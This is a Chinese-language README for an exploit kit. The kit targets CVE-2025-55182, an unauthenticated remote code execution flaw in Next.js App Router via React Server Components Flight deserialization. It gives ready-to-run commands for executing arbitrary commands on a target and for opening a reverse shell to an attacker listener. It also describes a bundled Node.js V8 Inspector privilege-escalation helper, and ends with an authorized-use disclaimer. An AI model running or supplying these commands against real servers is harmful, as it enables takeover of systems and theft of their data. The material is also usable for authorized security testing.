
针对 CVE-2025-55182 的独立漏洞利用程序,通过 React Server Components Flight 反序列化在 Next.js App Router 中实现未认证的远程代码执行(RCE),并附带反弹 Shell 及 Node.js V8 Inspector 权限提升辅助工具。
针对启用 React Server Components 的 Next.js App Router 应用中 CVE-2025-55182 的独立利用程序。向 server-action 端点构造 RSC Flight 载荷可实现未认证的远程代码执行。附带一个 Node.js V8 Inspector(调试端口)本地权限提升辅助工具,可通过 process.mainModule.require 沙箱绕过在特权进程中执行代码。
CVE: CVE-2025-55182
python3 -m pip install requests # 用于 Python PoC
cdp_privesc.pypython3 cdp_privesc.py <target>
react2shell-poc.py(RSC RCE — 内置版本,参见致谢)python3 react2shell-poc.py -t http://TARGET:3000 -c "id" # 基于错误的命令外带
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost LHOST --lport 4444
react2shell-poc.py 是 p3ta00 公开的 CVE-2025-55182 PoC,原样内置自
https://github.com/p3ta00/react2shell-poc,以实现自包含的利用链。
cdp_privesc.py(Node.js V8 Inspector 本地权限提升)为原创代码。
仅用于授权的安全测试和教育目的。请仅对您拥有或已获得明确书面许可的系统运行此工具。
作者:r3vpwnx